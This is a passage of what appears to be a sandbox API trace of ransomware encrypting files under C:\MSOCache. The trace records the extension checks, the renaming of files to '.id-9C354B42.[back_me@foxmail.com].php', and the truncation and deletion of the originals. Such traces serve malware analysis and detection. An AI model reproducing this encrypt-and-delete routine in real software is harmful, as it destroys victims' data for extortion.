Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0034.975] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.975] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.975] lstrlenW (lpString=".doc") returned 4 [0034.975] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.975] lstrlenW (lpString=".docx") returned 5 [0034.975] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.975] lstrlenW (lpString=".pdf") returned 4 [0034.975] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.975] lstrlenW (lpString=".xls") returned 4 [0034.975] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.975] lstrlenW (lpString=".xlsx") returned 5 [0034.975] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.975] lstrlenW (lpString=".ppt") returned 4 [0034.975] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.975] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.975] lstrlenW (lpString=".zip") returned 4 [0034.975] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.975] lstrlenW (lpString=".rar") returned 4 [0034.975] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.975] lstrlenW (lpString=".bz2") returned 4 [0034.975] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.975] lstrlenW (lpString=".7z") returned 3 [0034.975] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.975] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.975] lstrlenW (lpString=".dbf") returned 4 [0034.975] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.975] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.975] lstrlenW (lpString=".1cd") returned 4 [0034.975] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.975] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.976] lstrlenW (lpString=".jpg") returned 4 [0034.976] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.976] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.976] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.976] lstrlenW (lpString=".doc") returned 4 [0034.976] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.976] lstrlenW (lpString=".docx") returned 5 [0034.976] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.976] lstrlenW (lpString=".pdf") returned 4 [0034.976] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.976] lstrlenW (lpString=".xls") returned 4 [0034.976] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.976] lstrlenW (lpString=".xlsx") returned 5 [0034.976] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.976] lstrlenW (lpString=".ppt") returned 4 [0034.976] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.976] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.976] lstrlenW (lpString=".zip") returned 4 [0034.976] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.976] lstrlenW (lpString=".rar") returned 4 [0034.976] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.976] lstrlenW (lpString=".bz2") returned 4 [0034.976] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.976] lstrlenW (lpString=".7z") returned 3 [0034.976] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.976] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.976] lstrlenW (lpString=".dbf") returned 4 [0034.976] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.976] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.976] lstrlenW (lpString=".1cd") returned 4 [0034.976] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.976] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.977] lstrlenW (lpString=".jpg") returned 4 [0034.977] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.977] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0034.977] lstrlenW (lpString="Setup.xml") returned 9 [0034.977] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0034.977] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=2424) returned 1 [0034.977] CloseHandle (hObject=0x188) returned 1 [0034.977] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0034.978] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0034.978] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0034.978] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.978] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.978] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0034.979] GetLastError () returned 0x0 [0034.980] ReadFile (in: hFile=0x188, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x978, lpOverlapped=0x0) returned 1 [0034.981] WriteFile (in: hFile=0x18c, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x980, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x980, lpOverlapped=0x0) returned 1 [0034.982] ReadFile (in: hFile=0x188, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0034.982] WriteFile (in: hFile=0x18c, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0034.982] SetEndOfFile (hFile=0x18c) returned 1 [0034.982] CloseHandle (hObject=0x18c) returned 1 [0034.983] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.983] SetEndOfFile (hFile=0x188) returned 1 [0034.984] CloseHandle (hObject=0x188) returned 1 [0034.984] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0034.984] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0034.984] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.984] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.984] lstrlenW (lpString=".doc") returned 4 [0034.984] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.984] lstrlenW (lpString=".docx") returned 5 [0034.984] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.984] lstrlenW (lpString=".pdf") returned 4 [0034.984] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.984] lstrlenW (lpString=".xls") returned 4 [0034.984] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.984] lstrlenW (lpString=".xlsx") returned 5 [0034.985] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.985] lstrlenW (lpString=".ppt") returned 4 [0034.985] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.985] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.985] lstrlenW (lpString=".zip") returned 4 [0034.985] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.985] lstrlenW (lpString=".rar") returned 4 [0034.985] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.985] lstrlenW (lpString=".bz2") returned 4 [0034.985] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.985] lstrlenW (lpString=".7z") returned 3 [0034.985] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.985] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.985] lstrlenW (lpString=".dbf") returned 4 [0034.985] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.985] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.985] lstrlenW (lpString=".1cd") returned 4 [0034.985] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.985] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.985] lstrlenW (lpString=".jpg") returned 4 [0034.985] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.985] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.985] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.985] lstrlenW (lpString=".doc") returned 4 [0034.985] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.985] lstrlenW (lpString=".docx") returned 5 [0034.985] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.985] lstrlenW (lpString=".pdf") returned 4 [0034.985] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.985] lstrlenW (lpString=".xls") returned 4 [0034.985] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.985] lstrlenW (lpString=".xlsx") returned 5 [0034.985] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.986] lstrlenW (lpString=".ppt") returned 4 [0034.986] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.986] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.986] lstrlenW (lpString=".zip") returned 4 [0034.986] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.986] lstrlenW (lpString=".rar") returned 4 [0034.986] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.986] lstrlenW (lpString=".bz2") returned 4 [0034.986] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.986] lstrlenW (lpString=".7z") returned 3 [0034.986] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.986] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.986] lstrlenW (lpString=".dbf") returned 4 [0034.986] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.986] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.986] lstrlenW (lpString=".1cd") returned 4 [0034.986] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.986] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.986] lstrlenW (lpString=".jpg") returned 4 [0034.986] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.986] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0034.986] lstrlenW (lpString="WordMUI.xml") returned 11 [0034.986] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0034.987] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=1800) returned 1 [0034.987] CloseHandle (hObject=0x188) returned 1 [0034.987] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml")) returned 0x2020 [0034.987] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0034.987] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0034.987] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.987] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.987] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0034.987] GetLastError () returned 0x0 [0034.987] ReadFile (in: hFile=0x188, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x708, lpOverlapped=0x0) returned 1 [0034.989] WriteFile (in: hFile=0x18c, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x710, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x710, lpOverlapped=0x0) returned 1 [0034.990] ReadFile (in: hFile=0x188, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0034.990] WriteFile (in: hFile=0x18c, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xea, lpOverlapped=0x0) returned 1 [0034.990] SetEndOfFile (hFile=0x18c) returned 1 [0034.990] CloseHandle (hObject=0x18c) returned 1 [0034.991] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.991] SetEndOfFile (hFile=0x188) returned 1 [0034.991] CloseHandle (hObject=0x188) returned 1 [0034.991] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0034.992] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml")) returned 1 [0034.992] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0034.992] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0034.992] lstrlenW (lpString=".doc") returned 4 [0034.992] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.992] lstrlenW (lpString=".docx") returned 5 [0034.992] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.992] lstrlenW (lpString=".pdf") returned 4 [0034.992] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.992] lstrlenW (lpString=".xls") returned 4 [0034.992] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.992] lstrlenW (lpString=".xlsx") returned 5 [0034.992] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.992] lstrlenW (lpString=".ppt") returned 4 [0034.992] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.992] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0034.993] lstrlenW (lpString=".zip") returned 4 [0034.993] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.993] lstrlenW (lpString=".rar") returned 4 [0034.993] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.993] lstrlenW (lpString=".bz2") returned 4 [0034.993] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.993] lstrlenW (lpString=".7z") returned 3 [0034.993] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.993] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0034.993] lstrlenW (lpString=".dbf") returned 4 [0034.993] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.993] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0034.993] lstrlenW (lpString=".1cd") returned 4 [0034.993] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.993] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0034.993] lstrlenW (lpString=".jpg") returned 4 [0034.993] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.993] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0034.993] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0034.993] lstrlenW (lpString=".doc") returned 4 [0034.993] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.993] lstrlenW (lpString=".docx") returned 5 [0034.993] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.993] lstrlenW (lpString=".pdf") returned 4 [0034.993] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.994] lstrlenW (lpString=".xls") returned 4 [0034.994] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.994] lstrlenW (lpString=".xlsx") returned 5 [0034.994] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.994] lstrlenW (lpString=".ppt") returned 4 [0034.994] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.994] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0034.994] lstrlenW (lpString=".zip") returned 4 [0034.994] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.994] lstrlenW (lpString=".rar") returned 4 [0034.994] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.994] lstrlenW (lpString=".bz2") returned 4 [0034.994] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.994] lstrlenW (lpString=".7z") returned 3 [0034.994] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.994] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0034.994] lstrlenW (lpString=".dbf") returned 4 [0034.994] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.994] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0034.994] lstrlenW (lpString=".1cd") returned 4 [0034.994] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.994] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0034.994] lstrlenW (lpString=".jpg") returned 4 [0034.994] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.994] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0034.994] lstrlenW (lpString="Proof.xml") returned 9 [0034.994] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0035.249] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=1347) returned 1 [0035.250] CloseHandle (hObject=0x1a4) returned 1 [0035.250] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml")) returned 0x2020 [0035.250] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0035.250] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0035.250] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.250] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.250] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0035.250] GetLastError () returned 0x0 [0035.250] ReadFile (in: hFile=0x1a4, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x543, lpOverlapped=0x0) returned 1 [0035.252] WriteFile (in: hFile=0x1a8, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x550, lpOverlapped=0x0) returned 1 [0035.253] ReadFile (in: hFile=0x1a4, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.253] WriteFile (in: hFile=0x1a8, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0035.253] SetEndOfFile (hFile=0x1a8) returned 1 [0035.253] CloseHandle (hObject=0x1a8) returned 1 [0035.253] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.253] SetEndOfFile (hFile=0x1a4) returned 1 [0035.254] CloseHandle (hObject=0x1a4) returned 1 [0035.254] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) 